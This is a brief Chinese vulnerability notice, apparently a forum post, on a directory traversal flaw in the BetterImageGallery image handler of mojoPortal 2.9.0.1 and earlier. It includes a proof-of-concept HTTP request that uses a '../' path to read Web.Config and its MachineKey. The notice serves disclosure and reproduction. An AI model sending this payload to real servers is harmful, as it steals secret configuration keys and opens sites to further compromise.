mojoPortal是美国Joe Audette个人开发者的一套开源的、面向对象的网站架构(WSF)和内容管理系统(CMS)。该系统提供事件日历、相册、文件管理器等。
mojoPortal 2.9.0.1及之前版本存在安全漏洞,该漏洞源于BetterImageGallery API Controller中的ImageHandler Action容易受到目录遍历攻击,可能导致获取Web.Config文件中的MachineKey。
mojoPortal 2.9.0.1及之前版本
1.访问漏洞环境
2.对漏洞进行复现
POC
漏洞复现
GET /api/BetterImageGallery/imagehandler?path=../../../Web.Config HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
没有回复内容